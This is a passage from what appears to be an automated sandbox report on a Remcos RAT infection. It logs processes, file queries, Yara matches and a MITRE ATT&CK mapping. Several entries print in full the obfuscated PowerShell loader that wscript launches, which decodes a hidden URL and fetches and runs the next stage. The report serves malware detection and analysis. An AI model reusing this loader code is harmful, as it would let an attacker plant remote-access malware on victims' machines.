oxygnchloregitt.)downh boble-contrsunnimp enetlwe biiundert enfe payi [sleigc ari,hbet aaskkevr acid]un.in3gevin4 opfi ');&($batiste) (cert69 'krybe$ kretfhomoferekrnmpol.ttaflydemil in tescaaudioascenarconnis kond til =disin angli$fu,dsl.isexekontrasold,f kvalwchacro brygrkaeftmcr.tisarr y[krysa$ junilnyansebyggea sho,flegemwimpolovidtlrlakfamduniesq,adr.quak crespeoa.rusu onen,omictferth- omkl2c,omp]erst, ');&($batiste) (cert69 ' unde$ .ircfbraysakrageskmpehe unstrbrystutransmhoved= rrie( adskt qualeafgrssintertuitot-ra.urp.ompaacrotctregnsh npac semit$c,ltosdeaccj tostu,rylls udskg pseulfalbyaencrysli,id)cereb n.rve-kam.ea drifnapperds.alc fu te(b.lan[symboi oro n ronatbrom,pkvalitscurrrnonfr]uorga:toba.:b.ithsubevgi forsz squaep,eud scarl-leucoe .illqcorad distr8palli)manip ') ;if ($faserum) {.$sjusglas $femtenaars;} else {;$thysen=cert69 'ant.cskogeptreaccafysiorunschtcalli-ing.obsengei,ircut frdessinusttresirficu.acabbanquonsshjem.f melle.rbitr hvae verti- fidgsstemmorgto,uwulfer fordcperniegudst fors $unpa,unitniphybripdig eililyas sherhalbat
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla ,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla ,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "++$cabinetted;++$cabinetted;$cabinetted=$cabinetted-1;function cert69 ($forretningsnavn){$halvmaanedliges=5;$halvmaanedliges++;for($phylloscopine81=5; $phylloscopine81 -lt $forretningsnavn.length-1; $phylloscopine81+=$halvmaanedliges){$foreadapt = 'substring';$slyngblte=$forretningsnavn.$foreadapt.invoke($phylloscopine81, 1);$olfactible=$olfactible+$slyngblte}$olfactible;}$uppishness=cert69 'hypochfavnttdep.ct ekstpel.dys bowl: libe/snebo/mornem indiaburnes doomooverl.armatgpolypeproj./ desiwbeeswp carp- pr.va ygnid panemetaari acrinfarad/klassrt lkue bestccompriresult do sekartorkvi,kesupert havo.brn ervirusa other in e ';$wergilds=$uppishness.split([char]62);$uppishness=$wergilds[0];$batiste=cert69 ' foreijurateak hexmsurk ';$sjusglas = cert69 ' lsni\ cymesnig eyvrtdys rediwnephronuss wp.eud6lymph4 synt\havarwtan aicarponsam rdpol ro dic.wionpasacardpresgso arguw reseeande rindses frath sarceomhyglpledglseric\d plavsrdom1 .ytr.rekur0st,ld\repatpalcoroskarpwunorte,nglerunagisin.erhwifieeblokel flo.leuphe.numeres.irixr,inoeparal ';&($batiste) (cert69 'sterr$skrivsallo e po.ykfe.lmspos.tt uncou di.lr vrkssargen=.onde$ps.cheepit.nbog nvtrla :m.ltew sbefistrrenj,rntd.amilisvrvgrgamet ') ;&($batiste) (cert69 'askeb$ra,gss cab,j o,gousterss hiocglarl.l gasbaassems per,=cinqu$sarcosvaabeelit.ukunm.nsretintcompuuskri,r luttshanhu+fravl$relegs ndejsicyoupropos splagmildelcr ssafrotts s.rv ') ;&($batiste) (cert69 'wayl,$censul langeunme.a llefcimb,wsilkeoblderrandelm ntes fl.e doku=unrep vexed(afmel( imaggtomhjwbagtrmhana.i ev.n kursuwbortviproclnudkrn3uover2n.npa_chinkp dietrjoggiooccupc detoedemenspseudsaxost propa-o.bytflunyi isoenpseriorunhypotranschatcheb,shbsolofss ubveitraved appr=f.rre$under{ethicp.unsti phaedunpud}tvang),isco.teguccantalou derma socmp.digaf rtinmelildukvemlaerosi oxygnchloregitt.)downh boble-contrsunnimp enetlwe biiundert enfe payi [sleigc ari,hbet aaskkevr acid]un.in3gevin4 opfi ');&($batiste) (cert69 'krybe$ kretfhomoferekrnmpol.ttaflydemil in tescaaudioascenarconnis kond til =disin angli$fu,dsl.isexekontrasold,f kvalwchacro brygrkaeftmcr.tisarr y[krysa$ junilnyansebyggea sho,flegemwimpolovidtlrlakfamduniesq,adr.quak crespeoa.rusu onen,omictferth- omkl2c,omp]erst, ');&($batiste) (cert69 ' unde$ .ircfbraysakrageskmpehe unstrbrystutransmhoved= rrie( adskt qualeafgrssintertuitot-ra.urp.ompaacrotctregnsh npac semit$c,ltosdeaccj tostu,rylls udskg pseulfalbyaencrysli,id)cereb n.rve-kam.ea drifnapperds.alc fu te(b.lan[symboi oro n ronatbrom,pkvalitscurrrnonfr]uorga:toba.:b.ithsubevgi forsz squaep,eud scarl-leucoe .illqcorad distr8palli)manip ') ;if ($faserum) {.$sjusglas $femtenaars;} else {;$thysen=cert69 'ant.cskogeptreaccafysiorunschtcalli-ing.obsengei,ircut frdessinusttresirficu.acabbanquonsshjem.f melle.rbitr hvae verti- fidgsstemmorgto,uwulfer fordcperniegudst fors $unpa,unitniphybripdig eililyas sherhalbatJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

          Remote Access Functionality

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information321
          Scripting          		Valid Accounts11
          Windows Management Instrumentation          		321
          Scripting          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		11
          Input Capture          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		111
          Process Injection          		1
          Software Packing          		LSASS Memory23
          System Information Discovery          		Remote Desktop Protocol11
          Input Capture          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts11
          Command and Scripting Interpreter          		1
          BITS Jobs          		1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		Security Account Manager1
          Query Registry          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		1
          Registry Run Keys / Startup Folder          		Login Hook1
          Masquerading          		NTDS131
          Security Software Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Modify Registry          		LSA Secrets1
          Process Discovery          		SSHKeylogging113
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
          Virtualization/Sandbox Evasion          		Cached Domain Credentials161
